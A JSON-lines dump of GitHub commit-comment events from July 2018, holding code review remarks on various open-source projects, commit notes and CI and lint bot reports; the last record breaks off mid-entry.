{"id":"7980278950","type":"CommitCommentEvent","actor":{"login":"yyf1127324351"},"repo":{"name":"yyf1127324351/LocalGit"},"payload":{"comment":{"id":29743232,"position":null,"line":null,"path":null,"commit_id":"50454b684242ddcb72540c60a007523392a5e64f","created_at":"2018-07-18T02:32:40Z","updated_at":"2018-07-18T02:32:40Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-18T02:32:40Z"}
{"id":"7980279676","type":"CommitCommentEvent","actor":{"login":"derekcoder"},"repo":{"name":"derekcoder/SwiftDevHints"},"payload":{"comment":{"id":29743234,"position":null,"line":null,"path":null,"commit_id":"2c39838a06a4903f72b08f51abf525bcc14ead7c","created_at":"2018-07-18T02:32:55Z","updated_at":"2018-07-18T02:32:55Z","author_association":"OWNER","body":"Add constant"}},"created_at":"2018-07-18T02:32:55Z"}
{"id":"7980282360","type":"CommitCommentEvent","actor":{"login":"kmiller9393"},"repo":{"name":"kmiller9393/weathrly"},"payload":{"comment":{"id":29743241,"position":null,"line":null,"path":null,"commit_id":"14849a5188c20dbb5f87f36ddc726ac409bebc91","created_at":"2018-07-18T02:33:58Z","updated_at":"2018-07-18T02:33:58Z","author_association":"OWNER","body":"Looks good"}},"created_at":"2018-07-18T02:33:58Z"}
{"id":"7980283361","type":"CommitCommentEvent","actor":{"login":"aungnainghtay-kta"},"repo":{"name":"aungnainghtay-kta/hello_world"},"payload":{"comment":{"id":29743242,"position":null,"line":null,"path":null,"commit_id":"a7e6efdc85bc0f37326ead25c4df826d5ae1a369","created_at":"2018-07-18T02:34:19Z","updated_at":"2018-07-18T02:34:19Z","author_association":"OWNER","body":"this is new one"}},"created_at":"2018-07-18T02:34:19Z"}
{"id":"7980291866","type":"CommitCommentEvent","actor":{"login":"Scootzy"},"repo":{"name":"Scootzy/RPG-project"},"payload":{"comment":{"id":29743256,"position":null,"line":null,"path":null,"commit_id":"3d302d4595aeea6809b30221d24ab05f4059dc39","created_at":"2018-07-18T02:37:31Z","updated_at":"2018-07-18T02:37:31Z","author_association":"OWNER","body":"[Year 11 Computing Term 3 Programming Project.docx](https://github.com/Scootzy/RPG-project/files/2204126/Year.11.Computing.Term.3.Programming.Project.docx)\r\n"}},"created_at":"2018-07-18T02:37:31Z"}
{"id":"7980293211","type":"CommitCommentEvent","actor":{"login":"Scootzy"},"repo":{"name":"Scootzy/RPG-project"},"payload":{"comment":{"id":29743259,"position":null,"line":null,"path":null,"commit_id":"3d302d4595aeea6809b30221d24ab05f4059dc39","created_at":"2018-07-18T02:38:00Z","updated_at":"2018-07-18T02:38:00Z","author_association":"OWNER","body":"google doc: https://docs.google.com/document/d/13SuxhcDa9iQeZrJdFaQJ0d3n4SwF9LFFP1ZoYYdX_ZA/edit?ts=5b4ea433#"}},"created_at":"2018-07-18T02:38:00Z"}
{"id":"7980294593","type":"CommitCommentEvent","actor":{"login":"zhuowei"},"repo":{"name":"zhuowei/XNUQEMUScripts"},"payload":{"comment":{"id":29743267,"position":null,"line":null,"path":null,"commit_id":"17c2ed1b255a29f0a18a92b765366a539280dd32","created_at":"2018-07-18T02:38:31Z","updated_at":"2018-07-18T02:38:31Z","author_association":"OWNER","body":"@h3adshotzz fixed in the latest commit: now uses pyasn1 to parse the im4p instead of hardcoding an offset that changes every version"}},"created_at":"2018-07-18T02:38:31Z"}
{"id":"7980295857","type":"CommitCommentEvent","actor":{"login":"ASliceOfHammy"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29743268,"position":null,"line":null,"path":null,"commit_id":"43ae6fa926a38d00aa072d95b388b2d7dd5309d4","created_at":"2018-07-18T02:39:00Z","updated_at":"2018-07-18T02:39:00Z","author_association":"NONE","body":"rude ;-;\r\n"}},"created_at":"2018-07-18T02:39:00Z"}
{"id":"7980296441","type":"CommitCommentEvent","actor":{"login":"xoxuewei"},"repo":{"name":"FBU2018-L3/1-Up"},"payload":{"comment":{"id":29743271,"position":36,"line":69,"path":"One-Up/app/src/main/java/com/l3/one_up/HomeFragment.java","commit_id":"32219a9e074cde0d4b502c0abf6491a4d1852eff","created_at":"2018-07-18T02:39:13Z","updated_at":"2018-07-18T02:39:13Z","author_association":"NONE","body":"Will there ever be a case when user is null? If so, what should happen?"}},"created_at":"2018-07-18T02:39:13Z"}
{"id":"7980297264","type":"CommitCommentEvent","actor":{"login":"howdoicode5058"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29743272,"position":null,"line":null,"path":null,"commit_id":"43ae6fa926a38d00aa072d95b388b2d7dd5309d4","created_at":"2018-07-18T02:39:32Z","updated_at":"2018-07-18T02:39:32Z","author_association":"NONE","body":"to who tho kappa"}},"created_at":"2018-07-18T02:39:32Z"}
{"id":"7980298792","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29743276,"position":19,"line":186,"path":"src/Umbraco.Web/Editors/TemplateController.cs","commit_id":"e34926acd62f0590f4929dfdcd5e2ccedfeed514","created_at":"2018-07-18T02:40:07Z","updated_at":"2018-07-18T02:40:07Z","author_association":"MEMBER","body":"@nathanwoulfe just wondering if this check should just be taken care of in the Service methods like `CreateTemplateWithIdentity` just like it's being done with `CreateTemplateForContentType`, then the `IFileService.GetViewContent` method doesn't actually need to be added to the interface at all ?"}},"created_at":"2018-07-18T02:40:07Z"}
{"id":"7980301725","type":"CommitCommentEvent","actor":{"login":"fsanchez4"},"repo":{"name":"fsanchez4/DataStructuresProject"},"payload":{"comment":{"id":29743279,"position":1,"line":1,"path":"FINAL JAVA FILES","commit_id":"2cb5f3f1af572bc8ae369fac3cdb104dd43a778f","created_at":"2018-07-18T02:41:11Z","updated_at":"2018-07-18T02:41:11Z","author_association":"OWNER","body":"[test.txt](https://github.com/fsanchez4/DataStructuresProject/files/2204137/test.txt)\r\n"}},"created_at":"2018-07-18T02:41:11Z"}
{"id":"7980306467","type":"CommitCommentEvent","actor":{"login":"isuruf"},"repo":{"name":"conda-forge/zlib-feedstock"},"payload":{"comment":{"id":29743282,"position":5,"line":27,"path":".circleci/build_steps.sh","commit_id":"4c37c7741708ee7dffa155c5aecbb52ba8c4ec5a","created_at":"2018-07-18T02:43:01Z","updated_at":"2018-07-18T02:43:01Z","author_association":"MEMBER","body":"You can create version 2.0 and can test it"}},"created_at":"2018-07-18T02:43:01Z"}
{"id":"7980308825","type":"CommitCommentEvent","actor":{"login":"xoxuewei"},"repo":{"name":"FBU2018-L3/1-Up"},"payload":{"comment":{"id":29743285,"position":37,"line":70,"path":"One-Up/app/src/main/java/com/l3/one_up/HomeFragment.java","commit_id":"32219a9e074cde0d4b502c0abf6491a4d1852eff","created_at":"2018-07-18T02:43:57Z","updated_at":"2018-07-18T02:43:57Z","author_association":"NONE","body":"I'd recommend doing String concatenation using StringBuilder or something else in java library"}},"created_at":"2018-07-18T02:43:57Z"}
{"id":"7980312181","type":"CommitCommentEvent","actor":{"login":"nicooo21"},"repo":{"name":"nicooo21/website"},"payload":{"comment":{"id":29743293,"position":null,"line":null,"path":null,"commit_id":"eabb1a90f58a88fef9cfcdeb5a6225ad1a912b8e","created_at":"2018-07-18T02:45:12Z","updated_at":"2018-07-18T02:45:12Z","author_association":"OWNER","body":"Associating commit with #3 "}},"created_at":"2018-07-18T02:45:12Z"}
{"id":"7980318454","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29743307,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-18T02:47:33Z","updated_at":"2018-07-18T02:47:33Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-18T02:47:33Z"}
{"id":"7980319139","type":"CommitCommentEvent","actor":{"login":"hasini97"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29743308,"position":null,"line":null,"path":null,"commit_id":"56455f32dbd0ad375a3daf84d6154bb6a6527237","created_at":"2018-07-18T02:47:48Z","updated_at":"2018-07-18T02:47:48Z","author_association":"NONE","body":"'soc1h-cc-hasini-balasuriya.py'"}},"created_at":"2018-07-18T02:47:48Z"}
{"id":"7980319528","type":"CommitCommentEvent","actor":{"login":"HongminYang"},"repo":{"name":"misakasa10032/vcbeat_crawler"},"payload":{"comment":{"id":29743311,"position":null,"line":null,"path":null,"commit_id":"ce8a870f2f8069531b3b06e55e50df9c6243e548","created_at":"2018-07-18T02:47:57Z","updated_at":"2018-07-18T02:47:57Z","author_association":"NONE","body":"还在研究不过先感谢一下谢成大佬！"}},"created_at":"2018-07-18T02:47:57Z"}
{"id":"7980319904","type":"CommitCommentEvent","actor":{"login":"idodin"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29743312,"position":null,"line":null,"path":null,"commit_id":"4a2b310241f1132ddcb90b657b30b3d7cda8b2c8","created_at":"2018-07-18T02:48:07Z","updated_at":"2018-07-18T02:48:07Z","author_association":"MEMBER","body":"I believe it should. For now I think its best to integrate our changes in dev and then add the delimiter and format functionality (ideally in another branch but we could just commit directly to dev too) :p"}},"created_at":"2018-07-18T02:48:07Z"}
{"id":"7980322253","type":"CommitCommentEvent","actor":{"login":"imagire"},"repo":{"name":"honma612/study_skinning"},"payload":{"comment":{"id":29743321,"position":null,"line":null,"path":null,"commit_id":"5f2b8e0080a4dd4ccbdf154e7dd9585353ac8b0d","created_at":"2018-07-18T02:49:00Z","updated_at":"2018-07-18T02:49:00Z","author_association":"NONE","body":"これだとCPUに負荷がかかり、データの転送も毎回起こるという無駄がおきるので、GPUでのプログラマブルな処理が進んできたことを知ってもらえればと思います。"}},"created_at":"2018-07-18T02:49:00Z"}
{"id":"7980323006","type":"CommitCommentEvent","actor":{"login":"qyf404"},"repo":{"name":"jacoco/jacoco"},"payload":{"comment":{"id":29743322,"position":59,"line":94,"path":"org.jacoco.core/src/org/jacoco/core/internal/analysis/MethodAnalyzer.java","commit_id":"1962cf59bc403a27f68c55b39bb833b00fa386a0","created_at":"2018-07-18T02:49:18Z","updated_at":"2018-07-18T02:49:18Z","author_association":"NONE","body":"Why is “public” be deleted? My code depends it."}},"created_at":"2018-07-18T02:49:18Z"}
{"id":"7980323330","type":"CommitCommentEvent","actor":{"login":"code-shoily"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743323,"position":30,"line":30,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:49:25Z","updated_at":"2018-07-18T02:49:25Z","author_association":"OWNER","body":"That is so cool, didn't cross my mind that kind of pattern matching, thanks!"}},"created_at":"2018-07-18T02:49:25Z"}
{"id":"7980324071","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29743325,"position":19,"line":186,"path":"src/Umbraco.Web/Editors/TemplateController.cs","commit_id":"e34926acd62f0590f4929dfdcd5e2ccedfeed514","created_at":"2018-07-18T02:49:42Z","updated_at":"2018-07-18T02:49:42Z","author_association":"MEMBER","body":"Or even at the template repository level. I'm merging to v8 so will make changes there."}},"created_at":"2018-07-18T02:49:42Z"}
{"id":"7980324622","type":"CommitCommentEvent","actor":{"login":"Bored-AnnoYing"},"repo":{"name":"Bored-AnnoYing/SpringObject"},"payload":{"comment":{"id":29743326,"position":null,"line":null,"path":null,"commit_id":"018ad8d665439c2ac0130c6981cc893ab404a139","created_at":"2018-07-18T02:49:54Z","updated_at":"2018-07-18T02:49:54Z","author_association":"OWNER","body":"Modify Project Language"}},"created_at":"2018-07-18T02:49:54Z"}
{"id":"7980327267","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"bamachrn/ccp-openshift"},"payload":{"comment":{"id":29743330,"position":8,"line":8,"path":"ci/trigger_ci.sh","commit_id":"3752a63ef38e9b0d2aaaf66bfbe81e7260299128","created_at":"2018-07-18T02:50:55Z","updated_at":"2018-07-18T02:50:55Z","author_association":"NONE","body":"I see this is similar to one of the scripts I shared few days back. I'd prefer we keep variable names in tact. That is, use `PIPELINE_REPO`, `PIPELINE_BRANCH` instead of `CI_PIPELINE_REPO`, `CI_PIPELINE_BRANCH`. I'm suggesting this because I can imagine us writing a more generic script/flow which we will reuse across the deployments - dev, CI, pre-prod, prod. "}},"created_at":"2018-07-18T02:50:55Z"}
{"id":"7980327470","type":"CommitCommentEvent","actor":{"login":"code-shoily"},"repo":{"name":"code-shoily/elixir_algorithms"},"payload":{"comment":{"id":29743331,"position":36,"line":36,"path":"lib/basic/linked_list.ex","commit_id":"9511b2c6feb138a262c9071cfca409120d709f28","created_at":"2018-07-18T02:51:00Z","updated_at":"2018-07-18T02:51:00Z","author_association":"OWNER","body":"Yeah, also need to get `nil` as the empty tree, as well."}},"created_at":"2018-07-18T02:51:00Z"}
{"id":"7980330401","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"bamachrn/ccp-openshift"},"payload":{"comment":{"id":29743337,"position":8,"line":8,"path":"ci/trigger_ci.sh","commit_id":"3752a63ef38e9b0d2aaaf66bfbe81e7260299128","created_at":"2018-07-18T02:52:07Z","updated_at":"2018-07-18T02:52:07Z","author_association":"NONE","body":"Ah nvm, I see those variables are already there but for deploying the actual pipeline. Got that. "}},"created_at":"2018-07-18T02:52:07Z"}
{"id":"7980332442","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"bamachrn/ccp-openshift"},"payload":{"comment":{"id":29743338,"position":15,"line":15,"path":"ci/trigger_ci.sh","commit_id":"3752a63ef38e9b0d2aaaf66bfbe81e7260299128","created_at":"2018-07-18T02:52:52Z","updated_at":"2018-07-18T02:52:52Z","author_association":"NONE","body":"Have we commented these two variables because we don't want to send emails from CI?"}},"created_at":"2018-07-18T02:52:52Z"}
{"id":"7980332579","type":"CommitCommentEvent","actor":{"login":"hesy007"},"repo":{"name":"apache/incubator-dubbo"},"payload":{"comment":{"id":29743339,"position":28,"line":149,"path":"dubbo-remoting/dubbo-remoting-zookeeper/src/main/java/com/alibaba/dubbo/remoting/zookeeper/curator/CuratorZookeeperClient.java","commit_id":"d98d9977039d45b4ed39d795f716813193f575ea","created_at":"2018-07-18T02:52:55Z","updated_at":"2018-07-18T02:52:55Z","author_association":"NONE","body":"这里传空列表会导致在 RegistryDirectory 打印警告日志，如下：\r\nWARN  [main-EventThread    ] [c.a.d.r.i.RegistryDirectory   ]  [DUBBO] Unsupported category providers,configurators,routers in notified url: empty://xxxxx……"}},"created_at":"2018-07-18T02:52:55Z"}
{"id":"7980334269","type":"CommitCommentEvent","actor":{"login":"cpmpercussion"},"repo":{"name":"cpmpercussion/microjam"},"payload":{"comment":{"id":29743341,"position":null,"line":null,"path":null,"commit_id":"e9feabc689e857d359b3d178ae31b99f32670bf9","created_at":"2018-07-18T02:53:35Z","updated_at":"2018-07-18T02:53:35Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-18T02:53:35Z"}
{"id":"7980334597","type":"CommitCommentEvent","actor":{"login":"scroix"},"repo":{"name":"museumsvictoria/nodel"},"payload":{"comment":{"id":29743342,"position":null,"line":null,"path":null,"commit_id":"d81183afd50ba79df1ab7851e33a799a080346e4","created_at":"2018-07-18T02:53:41Z","updated_at":"2018-07-18T02:53:41Z","author_association":"CONTRIBUTOR","body":"😘 "}},"created_at":"2018-07-18T02:53:41Z"}
{"id":"7980337330","type":"CommitCommentEvent","actor":{"login":"tan5807"},"repo":{"name":"HiPro-IT/CPU-and-Memory-resource-usage-from-Google-Cluster-Data"},"payload":{"comment":{"id":29743368,"position":null,"line":null,"path":null,"commit_id":"6ce364b9bd44ac4f5f48ed1bd20dfad2cb53c939","created_at":"2018-07-18T02:54:44Z","updated_at":"2018-07-18T02:54:44Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-18T02:54:44Z"}
{"id":"7980338242","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29743371,"position":19,"line":186,"path":"src/Umbraco.Web/Editors/TemplateController.cs","commit_id":"e34926acd62f0590f4929dfdcd5e2ccedfeed514","created_at":"2018-07-18T02:55:05Z","updated_at":"2018-07-18T02:55:05Z","author_association":"MEMBER","body":"Sorry for all the messages... but just want to share the knowledge. The Template repository is the thing that does the IO stuff for templates it does this with an IFileSystem too and it has a method already to get the stream of the template file by path: https://github.com/umbraco/Umbraco-CMS/blob/dev-v7/src/Umbraco.Core/Persistence/Repositories/TemplateRepository.cs#L486 which should be used here instead.\r\n\r\nAs this new IFileService method is public, we'll leave it in v7 but will be removed in v8 but we should change the GetViewContent implementation in v7 to use the template repository instead of direct IO."}},"created_at":"2018-07-18T02:55:05Z"}
{"id":"7980351181","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-app-scanner"},"payload":{"comment":{"id":29743385,"position":null,"line":null,"path":null,"commit_id":"6dcf834f3739263784c349ba86b2815af24d735a","created_at":"2018-07-18T02:59:58Z","updated_at":"2018-07-18T02:59:58Z","author_association":"OWNER","body":"As per #7 "}},"created_at":"2018-07-18T02:59:58Z"}
{"id":"7985146914","type":"CommitCommentEvent","actor":{"login":"ankush1111"},"repo":{"name":"ratracegrad/node-mongo-demo"},"payload":{"comment":{"id":29755177,"position":null,"line":null,"path":null,"commit_id":"1c76723bbdaf25543050136a3a9f65f7531575fc","created_at":"2018-07-18T20:00:11Z","updated_at":"2018-07-18T20:00:11Z","author_association":"NONE","body":"what about delete method "}},"created_at":"2018-07-18T20:00:11Z"}
{"id":"7985152287","type":"CommitCommentEvent","actor":{"login":"Siaukovich"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.09"},"payload":{"comment":{"id":29755193,"position":50,"line":22,"path":"Matrix/MatrixSort.cs","commit_id":"98bc752f26d65fec85fa741bcc34fc0c45c5e37b","created_at":"2018-07-18T20:01:11Z","updated_at":"2018-07-18T20:01:11Z","author_association":"OWNER","body":"fixed, но мне кажется, что пользователю будет удобнее имея один компаратор сортировать с его помощью и по возрастанию, и по убыванию, вместо того чтобы писать два компаратора, которые будут различаться только четырьмя символами."}},"created_at":"2018-07-18T20:01:11Z"}
{"id":"7985152955","type":"CommitCommentEvent","actor":{"login":"Siaukovich"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.09"},"payload":{"comment":{"id":29755195,"position":110,"line":43,"path":"Matrix/MatrixSort.cs","commit_id":"98bc752f26d65fec85fa741bcc34fc0c45c5e37b","created_at":"2018-07-18T20:01:19Z","updated_at":"2018-07-18T20:01:19Z","author_association":"OWNER","body":"fixed"}},"created_at":"2018-07-18T20:01:19Z"}
{"id":"7985155678","type":"CommitCommentEvent","actor":{"login":"thibaultboursier"},"repo":{"name":"hdorgeval/testcafe-starter"},"payload":{"comment":{"id":29755200,"position":null,"line":null,"path":null,"commit_id":"c106d4e83055f92c34c7b51e11f4af0de2806ea4","created_at":"2018-07-18T20:01:54Z","updated_at":"2018-07-18T20:01:54Z","author_association":"NONE","body":"@hdorgeval Hello, can you give me your e-mail please ? Thanks (you'll remove comments after)."}},"created_at":"2018-07-18T20:01:54Z"}
{"id":"7985156762","type":"CommitCommentEvent","actor":{"login":"likelion"},"repo":{"name":"EricssonResearch/scott-eu"},"payload":{"comment":{"id":29755204,"position":24,"line":13,"path":"deployment/docker-compose.yml","commit_id":"5eb42fceb973d53a558e189a36980d842c2dd32e","created_at":"2018-07-18T20:02:08Z","updated_at":"2018-07-18T20:02:08Z","author_association":"CONTRIBUTOR","body":"you may disable it for local testing"}},"created_at":"2018-07-18T20:02:08Z"}
{"id":"7985157543","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29755205,"position":null,"line":null,"path":null,"commit_id":"f93cb448f1d8b8346dff13fffacfd3c9f85edde0","created_at":"2018-07-18T20:02:16Z","updated_at":"2018-07-18T20:02:16Z","author_association":"CONTRIBUTOR","body":"for those links to work in git, outside github I mean, u need couple more characters\r\nfor instance: f7466c28a5  👍 \r\n"}},"created_at":"2018-07-18T20:02:16Z"}
{"id":"7985158821","type":"CommitCommentEvent","actor":{"login":"leseb"},"repo":{"name":"ceph/ceph-ansible"},"payload":{"comment":{"id":29755208,"position":null,"line":null,"path":null,"commit_id":"cf01e596b6362f45991fee976fad9bf9183c42bf","created_at":"2018-07-18T20:02:32Z","updated_at":"2018-07-18T20:02:32Z","author_association":"CONTRIBUTOR","body":"@alfredodeza we are sorry about this, we had an issue with the pipeline which incorrectly validated the PR and thus got merged by our bot mergify. I should have reverted that right away, I just thought we could fix this quickly. I believe https://github.com/ceph/ceph-ansible/pull/2897 will do the trick, thanks for your patience."}},"created_at":"2018-07-18T20:02:32Z"}
{"id":"7985160421","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29755212,"position":null,"line":null,"path":null,"commit_id":"7168fa48e88ec877159be1867959d63d29ff7686","created_at":"2018-07-18T20:02:52Z","updated_at":"2018-07-18T20:02:52Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/cache-control](https://rsyncupdat-static-docs.pantheonsite.io/docs/cache-control)\n- [/docs/caching-advanced-topics](https://rsyncupdat-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n- [/docs/code](https://rsyncupdat-static-docs.pantheonsite.io/docs/code)\n- [/docs/database-connection-errors](https://rsyncupdat-static-docs.pantheonsite.io/docs/database-connection-errors)\n"}},"created_at":"2018-07-18T20:02:52Z"}
{"id":"7985163939","type":"CommitCommentEvent","actor":{"login":"rahulruhela"},"repo":{"name":"rahulruhela/BMSApp"},"payload":{"comment":{"id":29755219,"position":null,"line":null,"path":null,"commit_id":"0229b8c4f2c23823cf3d895cc324b6095cdcaf78","created_at":"2018-07-18T20:03:35Z","updated_at":"2018-07-18T20:03:35Z","author_association":"OWNER","body":" changes in aopp"}},"created_at":"2018-07-18T20:03:35Z"}
{"id":"7985164496","type":"CommitCommentEvent","actor":{"login":"theMadMaker"},"repo":{"name":"csuft/iVirtualCamera"},"payload":{"comment":{"id":29755222,"position":null,"line":null,"path":null,"commit_id":"45c9f548e859d06edfd98d050b4da9d9735350e3","created_at":"2018-07-18T20:03:42Z","updated_at":"2018-07-18T20:03:42Z","author_association":"NONE","body":"I don't understand how you designate the output TO this virtual camera. It's clear how to use the output as a video source but I don't see how to make that source display anything other than the placeholder image. Do I need some other certain software to output? Is it possible to use the OBS output as the virtual camera?"}},"created_at":"2018-07-18T20:03:42Z"}
{"id":"7985166943","type":"CommitCommentEvent","actor":{"login":"canerbagci"},"repo":{"name":"HalgrimThadeus/long-read-microbiome"},"payload":{"comment":{"id":29755226,"position":8,"line":33,"path":"src/model/FilteredSample.java","commit_id":"cba73e5f79ee5944843aeaee2fd0991db30fb548","created_at":"2018-07-18T20:04:13Z","updated_at":"2018-07-18T20:04:13Z","author_association":"COLLABORATOR","body":"I guess this should be the other way around: do the calculation if tree is loaded."}},"created_at":"2018-07-18T20:04:13Z"}
{"id":"7985171305","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29755232,"position":null,"line":null,"path":null,"commit_id":"2ef9d301f0869b443122e2ba543af054c5b0e53c","created_at":"2018-07-18T20:05:06Z","updated_at":"2018-07-18T20:05:06Z","author_association":"CONTRIBUTOR","body":"would you please elaborate the reason? 😃 "}},"created_at":"2018-07-18T20:05:06Z"}
{"id":"7985174418","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29755236,"position":null,"line":null,"path":null,"commit_id":"f93cb448f1d8b8346dff13fffacfd3c9f85edde0","created_at":"2018-07-18T20:05:44Z","updated_at":"2018-07-18T20:05:44Z","author_association":"MEMBER","body":"@Warpten clang*"}},"created_at":"2018-07-18T20:05:44Z"}
{"id":"7985175076","type":"CommitCommentEvent","actor":{"login":"grahamsider"},"repo":{"name":"quinnwerks/JSONPacketParser"},"payload":{"comment":{"id":29755238,"position":null,"line":null,"path":null,"commit_id":"f764c5d34870d920346afc4fed1ace33d7fd9344","created_at":"2018-07-18T20:05:52Z","updated_at":"2018-07-18T20:05:52Z","author_association":"COLLABORATOR","body":"$size(extPacketList) **"}},"created_at":"2018-07-18T20:05:52Z"}
{"id":"7985181736","type":"CommitCommentEvent","actor":{"login":"canerbagci"},"repo":{"name":"HalgrimThadeus/long-read-microbiome"},"payload":{"comment":{"id":29755249,"position":32,"line":29,"path":"src/model/Project.java","commit_id":"cba73e5f79ee5944843aeaee2fd0991db30fb548","created_at":"2018-07-18T20:07:13Z","updated_at":"2018-07-18T20:07:13Z","author_association":"COLLABORATOR","body":"maybe instead download and extract them. It's straightforward and simple enough.\r\n\r\nOr at worst, print more helpful error message - pointing the user from where to download it."}},"created_at":"2018-07-18T20:07:13Z"}
{"id":"7985185452","type":"CommitCommentEvent","actor":{"login":"chelsrosic"},"repo":{"name":"CityofToronto/bdit_data-sources"},"payload":{"comment":{"id":29755254,"position":null,"line":null,"path":null,"commit_id":"2e93c07fa8fc21a1569bf034546dd194116233f3","created_at":"2018-07-18T20:08:00Z","updated_at":"2018-07-18T20:08:00Z","author_association":"CONTRIBUTOR","body":"#130 "}},"created_at":"2018-07-18T20:08:00Z"}
{"id":"7985187892","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29755261,"position":29,"line":46,"path":"tests/TicTacToeTest.php","commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-18T20:08:31Z","updated_at":"2018-07-18T20:08:31Z","author_association":"NONE","body":"Both players are the same in terms of who wins. It doesn't feel right to have two methods `player0Won` and `playerXWon` - it just increases the surface of the API. You can reduce and streamline the API by having just one method for returning the winner. Maybe it should return null if there is no winner yet.\r\n\r\nFood for thought: if it's null, the game is in one of the states: still in progress, or a draw.\r\n\r\nHow do you design this?\r\n\r\nThink about various strategies and their advantages and disadvantages."}},"created_at":"2018-07-18T20:08:31Z"}
{"id":"7985188597","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29755262,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T20:08:40Z","updated_at":"2018-07-18T20:08:40Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2942 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T20:08:40Z"}
{"id":"7985192422","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29755269,"position":null,"line":null,"path":null,"commit_id":"91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c","created_at":"2018-07-18T20:09:30Z","updated_at":"2018-07-18T20:09:30Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/91a38fa86e6e6c4b7aeacb2fe6971199cdd9e48c/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    